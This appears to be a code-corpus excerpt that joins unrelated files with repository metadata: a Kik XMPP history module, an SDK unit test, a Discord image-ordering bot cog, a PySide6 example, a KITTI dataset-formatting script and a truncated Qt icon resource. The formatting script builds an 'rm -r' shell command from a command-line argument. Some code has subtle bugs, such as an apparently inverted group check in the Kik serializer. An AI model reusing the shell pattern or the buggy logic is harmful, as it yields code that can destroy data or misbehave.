] | 120 | 2017-07-07T14:07:14.000Z | 2022-02-22T03:14:23.000Z | kik_unofficial/datatypes/xmpp/history.py | TheGreatCodeholio/kik-bot-api-unofficial | c1f02b735dcb3e1d1b5e29a1ca04dd2f66557248 | [
"MIT"
] | 173 | 2017-07-07T04:31:19.000Z | 2021-11-20T02:59:20.000Z | kik_unofficial/datatypes/xmpp/history.py | TheGreatCodeholio/kik-bot-api-unofficial | c1f02b735dcb3e1d1b5e29a1ca04dd2f66557248 | [
"MIT"
] | 101 | 2017-07-11T19:43:17.000Z | 2022-03-03T02:04:05.000Z | from bs4 import BeautifulSoup
import time
from kik_unofficial.datatypes.xmpp.base_elements import XMPPElement, XMPPResponse
class Struct:
def __init__(self, **entries):
self.__dict__.update(entries)
class OutgoingAcknowledgement(XMPPElement):
"""
Represents an outgoing acknowledgement for a message ID
"""
def __init__(self, sender_jid, is_receipt, ack_id, group_jid):
super().__init__()
self.sender_jid = sender_jid
self.group_jid = group_jid
self.is_receipt = is_receipt
self.ack_id = ack_id
def serialize(self):
timestamp = str(int(round(time.time() * 1000)))
user_ack_data = (
'<sender jid="{}">'
'<ack-id receipt="{}">{}</ack-id>'
'</sender>'
).format(self.sender_jid, str(self.is_receipt).lower(), self.ack_id)
group_ack_data = (
'<sender jid="{}" g="{}">'
'<ack-id receipt="{}">{}</ack-id>'
'</sender>'
).format(self.sender_jid, self.group_jid, str(self.is_receipt).lower(), self.ack_id)
data = ('<iq type="set" id="{}" cts="{}">'
'<query xmlns="kik:iq:QoS">'
'<msg-acks>'
'{}'
'</msg-acks>'
'<history attach="false" />'
'</query>'
'</iq>'
).format(self.message_id, timestamp, user_ack_data if self.group_jid != None else group_ack_data)
return data.encode()
class OutgoingHistoryRequest(XMPPElement):
"""
Represents an outgoing request for the account's messaging history
"""
def __init__(self):
super().__init__()
def serialize(self):
timestamp = str(int(round(time.time() * 1000)))
data = ('<iq type="set" id="{}" cts="{}">'
'<query xmlns="kik:iq:QoS">'
'<msg-acks />'
'<history attach="true" />'
'</query>'
'</iq>'
).format(self.message_id, timestamp,)
return data.encode()
class HistoryResponse(XMPPResponse):
"""
Represents a Kik messaging history response.
"""
def __init__(self, data: BeautifulSoup):
super().__init__(data)
self.id = data["id"]
if data.query.history:
self.more = data.query.history.has_attr("more")
self.from_jid = data["from"]
self.messages = []
for message in data.query.history:
if message["type"] == "receipt":
args = {
'type':'receipt',
'from_jid': message["from"],
'receipt_type':message.receipt["type"],
'id':message.receipt.msgid["id"]
}
self.messages.append(Struct(**args))
elif message["type"] == "chat":
args = {
'type':'chat',
'id':message["id"],
'from_jid':message["from"],
'body': message.body.text if message.body else None,
'preview': message.preview.text if message.preview else None,
'timestamp': message.kik["timestamp"]
}
self.messages.append(Struct(**args))
elif message["type"] == "groupchat":
args = {
'type': 'groupchat',
'id': message["id"],
'from_jid': message["from"],
'body': message.body.text if message.body else None,
'preview': message.preview.text if message.preview else None,
'timestamp': message.kik["timestamp"],
'group_jid': message.g["jid"]
}
self.messages.append(Struct(**args))
| 39.546296 | 114 | 0.453055 | 4,126 | 0.96605 | 0 | 0 | 0 | 0 | 0 | 0 | 896 | 0.209787 |
44682de12346bdb7a5f9ddce92b3b5515a1d9846 | 826 | py | Python | tests/test_flavor.py | cloudscale-ch/cloudscale-python-sdk | 67f9509f698dbaba529f183ba50694770a0c64bd | [
"MIT"
] | 2 | 2020-07-18T16:43:32.000Z | 2020-11-14T12:51:38.000Z | tests/test_flavor.py | cloudscale-ch/cloudscale-python-sdk | 67f9509f698dbaba529f183ba50694770a0c64bd | [
"MIT"
] | 4 | 2020-08-20T08:38:06.000Z | 2020-12-09T22:12:05.000Z | tests/test_flavor.py | cloudscale-ch/cloudscale-python-sdk | 67f9509f698dbaba529f183ba50694770a0c64bd | [
"MIT"
] | null | null | null | import responses
from cloudscale import (
CLOUDSCALE_API_URL,
Cloudscale,
CloudscaleApiException,
CloudscaleException,
)
FLAVOR_RESP = {
"slug": "flex-2",
"name": "Flex-2",
"vcpu_count": 1,
"memory_gb": 2,
"zones": [{"slug": "rma1"}, {"slug": "lpg1"}],
}
@responses.activate
def test_flavor_get_all():
responses.add(
responses.GET, CLOUDSCALE_API_URL + "/flavors", json=[FLAVOR_RESP], status=200
)
responses.add(
responses.GET, CLOUDSCALE_API_URL + "/flavors", json=[FLAVOR_RESP], status=200
)
responses.add(responses.GET, CLOUDSCALE_API_URL + "/flavors", json={}, status=500)
cloudscale = Cloudscale(api_token="token")
flavors = cloudscale.flavor.get_all()
assert flavors[0]["slug"] == "flex-2"
assert flavors[0]["name"] == "Flex-2"
| 25.8125 | 86 | 0.644068 | 0 | 0 | 0 | 0 | 531 | 0.642857 | 0 | 0 | 147 | 0.177966 |
4468581d70ebf3e6fb721882f185cef4082b1c84 | 7,213 | py | Python | cogs/order.py | SilentSerenityy/JDBot | cd404000f06d51757439e435b2aaedbbab233144 | [
"MIT"
] | null | null | null | cogs/order.py | SilentSerenityy/JDBot | cd404000f06d51757439e435b2aaedbbab233144 | [
"MIT"
] | null | null | null | cogs/order.py | SilentSerenityy/JDBot | cd404000f06d51757439e435b2aaedbbab233144 | [
"MIT"
] | null | null | null | import os, discord, time, async_cse, random, TenGiphPy
from discord.ext import commands
from difflib import SequenceMatcher
from discord.ext.commands.cooldowns import BucketType
tenor_client = TenGiphPy.Tenor(token=os.environ["tenor_key"])
giphy_client = TenGiphPy.Giphy(token=os.environ["giphy_token"])
class Order(commands.Cog):
def __init__(self,client):
self.client = client
@commands.cooldown(1,30,BucketType.user)
@commands.group(name="order",invoke_without_command=True)
async def order(self,ctx,*,args=None):
if args is None:
await ctx.send("You can't order nothing.")
if args:
time_before=time.process_time()
image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
try:
results = await image_client.search(args, safesearch=True, image_search=True)
emoji_image = sorted(results, key=lambda x: SequenceMatcher(None, x.image_url,args).ratio())[-1]
except async_cse.search.NoResults:
await ctx.send("No results found :(")
await image_client.close()
return
await image_client.close()
time_after=time.process_time()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.avatar_url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.client.get_channel(738912143679946783).send(embed=embed)
@commands.cooldown(1,30,BucketType.user)
@order.command(brief="a command to shuffle images from google images")
async def shuffle(self,ctx,*,args=None):
if args is None:
await self.order(ctx,args="shuffle")
if args:
time_before=time.process_time()
image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
try:
results = await image_client.search(args, safesearch=True, image_search=True)
except async_cse.search.NoResults:
await ctx.send("No results found :(")
await image_client.close()
return
emoji_image = random.choice(results)
await image_client.close()
time_after=time.process_time()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.avatar_url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.client.get_channel(738912143679946783).send(embed=embed)
@commands.cooldown(1,30,BucketType.user)
@commands.command(brief="a command to shuffle images from google images",aliases=["order-shuffle"])
async def order_shuffle(self,ctx,*,args=None):
if args is None:
await ctx.send("You can't order nothing")
if args:
time_before=time.process_time()
image_client=async_cse.Search(os.environ["image_api_key"],engine_id=os.environ["google_image_key"])
try:
results = await image_client.search(args, safesearch=True, image_search=True)
except async_cse.search.NoResults:
await ctx.send("No results found :(")
await image_client.close()
return
emoji_image = random.choice(results)
await image_client.close()
time_after=time.process_time()
try:
await ctx.message.delete()
except discord.errors.Forbidden:
pass
embed = discord.Embed(title=f"Item: {args}", description=f"{ctx.author} ordered a {args}",color=random.randint(0, 16777215),timestamp=ctx.message.created_at)
embed.set_author(name=f"order for {ctx.author}:",icon_url=(ctx.author.avatar_url))
embed.add_field(name="Time Spent:",value=f"{int((time_after - time_before)*1000)}MS")
embed.add_field(name="Powered by:",value="Google Images Api")
embed.set_image(url=emoji_image.image_url)
embed.set_footer(text = f"{ctx.author.id} \nCopyright: I don't know the copyright.")
await ctx.send(content="Order has been logged for safety purposes(we want to make sure no unsafe search is sent)",embed=embed)
await self.client.get_channel(738912143679946783).send(embed=embed)
@commands.cooldown(1,30,BucketType.user)
@commands.group(name="tenor",invoke_without_command=True)
async def tenor(self,ctx,*,args=None):
if args:
results = await self.client.loop.run_in_executor(None, tenor_client.search(args, safesearch=True, limit=10))
print(results)
#going to be swapping to an async Tenorgiphy soon lol. This is true :D
if args is None:
await ctx.send("You can't search for nothing")
@tenor.command(help="work in progress",name="shuffle")
async def tenor_random(self,ctx,*,args=None):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("tenor shuffle")
@commands.command(help="work in progress",aliases=["tenor-shuffle"])
async def tenor_shuffle(self,ctx,*,args):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("tenor shuffle")
@commands.group(name="giphy",invoke_without_command=True)
async def giphy(self,ctx,*,args=None):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("tenor")
@giphy.command(help="work in progress",name="shuffle")
async def giphy_random(self,ctx,*,args=None):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("giphy shuffle")
@commands.command(help="work in progress",aliases=["giphy-shuffle"])
async def giphy_shuffle(self,ctx,*,args):
if args:
await ctx.send("WIP")
if args is None:
await ctx.send("That doesn't have any value.")
await ctx.send("giphy shuffle")
async def cog_command_error(self,ctx,error):
if ctx.command and ctx.command.has_error_handler():
pass
else:
await ctx.send(error)
def setup(client):
client.add_cog(Order(client)) | 43.451807 | 163 | 0.694579 | 6,855 | 0.950367 | 0 | 0 | 6,582 | 0.912519 | 5,948 | 0.824622 | 1,770 | 0.24539 |
44685ac8d733d07256270373907d763751c70fec | 1,567 | py | Python | gui_pyside6/ejemplo_cuatro/manejo_eventos.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | gui_pyside6/ejemplo_cuatro/manejo_eventos.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | gui_pyside6/ejemplo_cuatro/manejo_eventos.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | # signals (eventos) y slots (metodos que procesan los eventos)
from PySide6.QtWidgets import QApplication, QMainWindow, QPushButton, QWidget, QVBoxLayout, QHBoxLayout, QLabel, QLineEdit, QMessageBox
from PySide6.QtCore import QSize
import sys
class VentanaPrincipal(QMainWindow):
def __init__(self):
super().__init__()
self.setWindowTitle("Signals y Slots")
# boton
boton = QPushButton("Click Aqui")
# conectamos el evento chequedado, por defecto esta en False
boton.setCheckable(True)
# Conectamos otro slot al evento chequear
boton.clicked.connect(self._evento_chequeado)
# conectamos el evento signal click con el slot llamado evento_click (funcion)
boton.clicked.connect(self._evento_click)
# se publica o muestra el boton
self.setCentralWidget(boton)
def _evento_click(self):
# se muestra un mensaje de alerta
#QMess""ageBox.information(self, "Evento", "Se ha hecho click")
# accedemosal estado del boton para saber si esta checado o no
print("evento click: ", self.boton_checado)
print("evento click")
def _evento_chequeado(self, chequeado):
# se muestra un mensaje de alerta
#QMessageBox.information(self, "Evento", "Se ha chequeado")
self.boton_checado = chequeado
print("evento chequeado: ", self.boton_checado)
if __name__ == '__main__':
app = QApplication(sys.argv)
ventana = VentanaPrincipal()
ventana.show()
sys.exit(app.exec_()) | 40.179487 | 135 | 0.67709 | 1,175 | 0.74984 | 0 | 0 | 0 | 0 | 0 | 0 | 618 | 0.394384 |
44689571888025e3ab953e020afce0ebacd74326 | 2,650 | py | Python | util/format_files.py | tammam1998/PCDet | ad5b24934fb35892ff073e364dab6acadbd3f135 | [
"Apache-2.0"
] | null | null | null | util/format_files.py | tammam1998/PCDet | ad5b24934fb35892ff073e364dab6acadbd3f135 | [
"Apache-2.0"
] | null | null | null | util/format_files.py | tammam1998/PCDet | ad5b24934fb35892ff073e364dab6acadbd3f135 | [
"Apache-2.0"
] | null | null | null | from utils import *
from sys import argv
import os
DEFUALT_PATH = os.path.realpath(__file__).replace("/format_files.py", "")
def make_image_dir(to_path, filenames):
""" takes a list of filenames and makes a sample image for each to match kitti format"""
image_dir = os.path.join(to_path, "image_2")
os.makedirs(image_dir)
for f in filenames:
image_file = os.path.join(image_dir, f + ".png")
os.system("cp sample.png {}".format(image_file))
def make_calib_dir(to_path, filenames):
""" takes a list of filenames and makes a fake calib for each to match kitti format"""
calib_dir = os.path.join(to_path, "calib")
os.makedirs(calib_dir)
for f in filenames:
calib_file = os.path.join(calib_dir, f + ".txt")
os.system("cp calib.txt {}".format(calib_file))
def make_velo_dir(to_path, bin_files):
""" takes a list of bin files and makes a copies them to match kitti format"""
velo_dir = os.path.join(to_path, "velodyne")
os.makedirs(velo_dir)
for bin_file in bin_files:
# calib_file = os.path.join(calib_dir, f + ".txt")
# os.system("cp calib.txt {}".format(calib_file))
_, name = os.path.split(bin_file)
velo_file = os.path.join(velo_dir, name)
os.system("cp {} {}".format(bin_file, velo_file))
def create_image_set(to_path, filenames):
set_dir = os.path.join(to_path, "ImageSets")
os.makedirs(set_dir)
test_file = os.path.join(set_dir, "test.txt")
with open(test_file, "w") as f:
for name in sorted(filenames):
f.write(str(name) +"\n")
train_file = os.path.join(set_dir, "train.txt")
f = open(train_file, "w")
val_file = os.path.join(set_dir, "val.txt")
f = open(val_file, "w")
def main(from_path, to_path, split="testing"):
filenames = [f.replace(".bin", "") for f in os.listdir(from_path) if f.endswith(".bin")]
bin_files = [os.path.join(from_path, f) for f in os.listdir(from_path) if f.endswith(".bin")]
create_image_set(to_path, filenames)
if split == "testing":
to_path = os.path.join(to_path, "testing")
else:
to_path = os.path.join(to_path, "training")
make_image_dir(to_path, filenames)
make_calib_dir(to_path, filenames)
make_velo_dir(to_path, bin_files)
if __name__ == "__main__":
"""takes path as argument"""
if len(argv) > 1:
from_path = argv[1]
to_path = os.path.join(DEFUALT_PATH, "data/kitti") if len(argv)==2 else argv[2]
os.system("rm -r {}".format(to_path))
else:
raise Exception("please incluude from_dir and to_dir in args")
main(from_path, to_path) | 36.805556 | 97 | 0.651698 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 670 | 0.25283 |
446910272f530e7a9c174ed37e4268b3d0995159 | 29,890 | py | Python | src/rc_icons.py | lmdu/dockey | a8ae34c780c952cb26270a173de08897b34c7252 | [
"MIT"
] | null | null | null | src/rc_icons.py | lmdu/dockey | a8ae34c780c952cb26270a173de08897b34c7252 | [
"MIT"
] | null | null | null | src/rc_icons.py | lmdu/dockey | a8ae34c780c952cb26270a173de08897b34c7252 | [
"MIT"
] | null | null | null | # Resource object code (Python 3)
# Created by: object code
# Created by: The Resource Compiler for Qt version 6.3.0
# WARNING! All changes made in this file will be lost!
from PySide6 import QtCore
qt_resource_data = b"\
\x00\x00\x02\xd8\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<g>\
\x0d\x0a\x09<path d=\x22M9,4\
c2.8,0,5,2.2,5,5\
s-2.2,5-5,5s-5-2\
.2-5-5S6.2,4,9,4\
M9,3C5.7,3,3,5.\
7,3,9s2.7,6,6,6s\
6-2.7,6-6S12.3,3\
,9,3L9,3z\x22/>\x0d\x0a</\
g>\x0d\x0a<path d=\x22M15\
.9,8h1.6C17.8,8,\
18,8.2,18,8.5v9c\
0,0.3-0.2,0.5-0.\
5,0.5h-9C8.2,18,\
8,17.8,8,17.5v-1\
.6c-0.3,0-0.7-0.\
1-1-0.2v1.8\x0d\x0a\x09C7\
,18.3,7.7,19,8.5\
,19l0,0h9c0.8,0,\
1.5-0.7,1.5-1.5l\
0,0v-9C19,7.7,18\
.3,7,17.5,7h-1.8\
C15.8,7.3,15.9,7\
.7,15.9,8z\x22/>\x0d\x0a<\
/svg>\x0d\x0a\
\x00\x00\x03\x13\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M9,12c0-0.\
3,0.2-0.5,0.5-0.\
5h3c0.3,0,0.5,0.\
2,0.5,0.5s-0.2,0\
.5-0.5,0.5h-3C9.\
2,12.5,9,12.3,9,\
12z M6.9,7.1\x0d\x0a\x09C\
6.7,7,6.3,7,6.1,\
7.1S6,7.7,6.1,7.\
9l0,0l1.6,1.6l-1\
.6,1.6c-0.2,0.2-\
0.2,0.5,0,0.7s0.\
5,0.2,0.7,0l2-2C\
9,9.7,9,9.3,8.9,\
9.1l0,0\x0d\x0a\x09L6.9,7\
.1z\x22/>\x0d\x0a<path d=\
\x22M5,4C3.9,4,3,4.\
9,3,6v10c0,1.1,0\
.9,2,2,2h12c1.1,\
0,2-0.9,2-2V6c0-\
1.1-0.9-2-2-2H5z\
M17,5c0.6,0,1,0\
.4,1,1v10\x0d\x0a\x09c0,0\
.6-0.4,1-1,1H5c-\
0.6,0-1-0.4-1-1V\
6c0-0.6,0.4-1,1-\
1H17z\x22/>\x0d\x0a</svg>\
\x0d\x0a\
\x00\x00\x02\x8d\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22em\
oji\x22 xmlns=\x22http\
://www.w3.org/20\
00/svg\x22 xmlns:xl\
ink=\x22http://www.\
w3.org/1999/xlin\
k\x22 x=\x220px\x22 y=\x220p\
x\x22\x0d\x0a\x09 viewBox=\x220\
0 72 72\x22 style=\
\x22enable-backgrou\
nd:new 0 0 72 72\
;\x22 xml:space=\x22pr\
eserve\x22>\x0d\x0a<style\
type=\x22text/css\x22\
>\x0d\x0a\x09.st0{opacity\
:0.6;}\x0d\x0a\x09.st1{fi\
ll:#DC3545;}\x0d\x0a\x09.\
st2{fill:none;st\
roke:#000000;str\
oke-width:2;stro\
ke-linejoin:roun\
d;}\x0d\x0a</style>\x0d\x0a<\
g id=\x22color\x22 cla\
ss=\x22st0\x22>\x0d\x0a\x09<cir\
cle class=\x22st1\x22 \
cx=\x2236\x22 cy=\x2236\x22 \
r=\x2230\x22/>\x0d\x0a</g>\x0d\x0a\
<g id=\x22line\x22>\x0d\x0a\x09\
<circle class=\x22s\
t2\x22 cx=\x2236\x22 cy=\x22\
36\x22 r=\x2231\x22/>\x0d\x0a</\
g>\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03$\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 focusabl\
e=\x22false\x22 xmlns=\
\x22http://www.w3.o\
rg/2000/svg\x22 xml\
ns:xlink=\x22http:/\
/www.w3.org/1999\
/xlink\x22\x0d\x0a\x09 x=\x220p\
x\x22 y=\x220px\x22 viewB\
ox=\x220 0 512 512\x22\
style=\x22enable-b\
ackground:new 0 \
0 512 512;\x22 xml:\
space=\x22preserve\x22\
>\x0d\x0a<style type=\x22\
text/css\x22>\x0d\x0a\x09.st\
0{fill:#2A7400;s\
troke:#000000;st\
roke-width:5;str\
oke-miterlimit:1\
0;}\x0d\x0a\x09.st1{fill:\
#FFFFFF;}\x0d\x0a</sty\
le>\x0d\x0a<path class\
=\x22st0\x22 d=\x22M256,0\
C114.6,0,0,114.6\
,0,256s114.6,256\
,256,256s256-114\
.6,256-256S397.4\
,0,256,0z\x22/>\x0d\x0a<p\
ath class=\x22st1\x22 \
d=\x22M208,335.99V1\
52c0-13.25-10.75\
-24-24-24h0c-13.\
25,0-24,10.75-24\
,24v183.99v23c0,\
13.81,11.19,25,2\
5,25h23h120.06\x0d\x0a\
\x09c13.25,0,24-10.\
75,24-24v0c0-13.\
25-10.75-24-24-2\
4H208z\x22/>\x0d\x0a</svg\
>\x0d\x0a\
\x00\x00\x03\xcb\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 26.2.1,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M16.5,4C15\
.7,4,15,4.7,15,5\
.5S15.7,7,16.5,7\
C17.3,7,18,6.3,1\
8,5.5S17.3,4,16.\
5,4z M14,5.5C14,\
4.1,15.1,3,16.5,\
3\x0d\x0a\x09C17.9,3,19,4\
.1,19,5.5C19,6.9\
,17.9,8,16.5,8c-\
0.7,0-1.4-0.3-1.\
9-0.9l-6.7,3.1c0\
.2,0.5,0.2,1,0,1\
.5l6.7,3.1c0.9-1\
,2.5-1.2,3.5-0.3\
\x0d\x0a\x09c1,0.9,1.2,2.\
5,0.3,3.5s-2.5,1\
.2-3.5,0.3c-0.8-\
0.7-1.1-1.7-0.8-\
2.6l-6.7-3.1c-0.\
9,1-2.5,1.2-3.5,\
0.3s-1.2-2.5-0.3\
-3.5\x0d\x0a\x09s2.5-1.2,\
3.5-0.3c0.1,0.1,\
0.2,0.2,0.3,0.3l\
6.7-3.1C14,6,14,\
5.8,14,5.5z M5.5\
,9.5C4.7,9.5,4,1\
0.2,4,11s0.7,1.5\
,1.5,1.5S7,11.8,\
7,11\x0d\x0a\x09S6.3,9.5,\
5.5,9.5z M16.5,1\
5c-0.8,0-1.5,0.7\
-1.5,1.5c0,0.8,0\
.7,1.5,1.5,1.5c0\
.8,0,1.5-0.7,1.5\
-1.5C18,15.7,17.\
3,15,16.5,15z\x22/>\
\x0d\x0a</svg>\x0d\x0a\
\x00\x00\x03\xc7\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 20 20\x22 sty\
le=\x22enable-backg\
round:new 0 0 20\
20;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<st\
yle type=\x22text/c\
ss\x22>\x0d\x0a\x09.st0{fill\
-rule:evenodd;cl\
ip-rule:evenodd;\
}\x0d\x0a</style>\x0d\x0a<pa\
th class=\x22st0\x22 d\
=\x22M8.5,14c3,0,5.\
5-2.5,5.5-5.5S11\
.5,3,8.5,3l0,0C5\
.5,3,3,5.5,3,8.5\
S5.5,14,8.5,14z \
M15,8.5c0,3.6-2.\
9,6.5-6.5,6.5\x0d\x0a\x09\
S2,12.1,2,8.5S4.\
9,2,8.5,2S15,4.9\
,15,8.5z\x22/>\x0d\x0a<pa\
th d=\x22M12.3,13.7\
c0,0,0.1,0.1,0.1\
,0.1l3.9,3.8c0.4\
,0.4,1,0.4,1.4,0\
s0.4-1,0-1.4l-3.\
9-3.9c0,0-0.1-0.\
1-0.1-0.1\x0d\x0a\x09C13.\
3,12.9,12.9,13.3\
,12.3,13.7L12.3,\
13.7z\x22/>\x0d\x0a<path \
class=\x22st0\x22 d=\x22M\
8.5,5C8.8,5,9,5.\
2,9,5.5V8h2.5C11\
.8,8,12,8.2,12,8\
.5S11.8,9,11.5,9\
H9v2.5C9,11.8,8.\
8,12,8.5,12S8,11\
.8,8,11.5\x0d\x0a\x09V9H5\
.5C5.2,9,5,8.8,5\
,8.5S5.2,8,5.5,8\
H8V5.5C8,5.2,8.2\
,5,8.5,5z\x22/>\x0d\x0a</\
svg>\x0d\x0a\
\x00\x00\x02\xc7\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 22 22\x22 sty\
le=\x22enable-backg\
round:new 0 0 22\
22;\x22 xml:space=\
\x22preserve\x22>\x0d\x0a<pa\
th d=\x22M11.2,4.1c\
-0.1,0-0.3,0-0.4\
,0l-6,2.4L11,9l6\
.2-2.5L11.2,4.1z\
M18,7.2l-6.5,2.\
6v7.9l6.5-2.6V7.\
2L18,7.2z M10.5,\
17.8V9.8\x0d\x0a\x09L4,7.\
2v7.9C4,15.2,10.\
5,17.8,10.5,17.8\
z M10.4,3.2c0.4-\
0.1,0.8-0.1,1.1,\
0L18.7,6C18.9,6.\
1,19,6.3,19,6.5v\
8.7c0,0.4-0.2,0.\
8-0.6,0.9\x0d\x0a\x09L11.\
2,19c-0.1,0-0.3,\
0-0.4,0l-7.2-2.9\
C3.2,15.9,3,15.6\
,3,15.2V6.5C3,6.\
3,3.1,6.1,3.3,6L\
10.4,3.2z\x22/>\x0d\x0a</\
svg>\x0d\x0a\
\x00\x00\x08\x98\
<\
?xml version=\x221.\
0\x22 encoding=\x22utf\
-8\x22?>\x0d\x0a<!-- Gene\
rator: Adobe Ill\
ustrator 24.1.2,\
SVG Export Plug\
-In . SVG Versio\
n: 6.00 Build 0)\
-->\x0d\x0a<svg vers\
ion=\x221.1\x22 id=\x22\xe5\x9b\
\xbe\xe5\xb1\x82_1\x22 xmlns=\x22h\
ttp://www.w3.org\
/2000/svg\x22 xmlns\
:xlink=\x22http://w\
ww.w3.org/1999/x\
link\x22 x=\x220px\x22 y=\
\x220px\x22\x0d\x0a\x09 viewBox\
=\x220 0 256 256\x22 s\
tyle=\x22enable-bac\
kground:new 0 0 \
256 256;\x22 xml:sp\
ace=\x22preserve\x22>\x0d\
\x0a<style type=\x22te\
xt/css\x22>\x0d\x0a\x09.st0{\
fill:none;}\x0d\x0a\x09.s\
t1{display:none;\
}\x0d\x0a\x09.st2{display\
:inline;fill:non\
e;}\x0d\x0a\x09.st3{displ\
ay:inline;fill:#\
FFFFFF;}\x0d\x0a\x09.st4{\
fill:#39B54A;}\x0d\x0a\
</style>\x0d\x0a<path \
class=\x22st0\x22 d=\x22M\
256,128\x22/>\x0d\x0a<pat\
h class=\x22st0\x22 d=\
\x22M128,256C57.3,2\
56,0,198.7,0,128\
S57.3,0,128,0\x22/>\
\x0d\x0a<g class=\x22st1\x22\
>\x0d\x0a\x09<path class=\
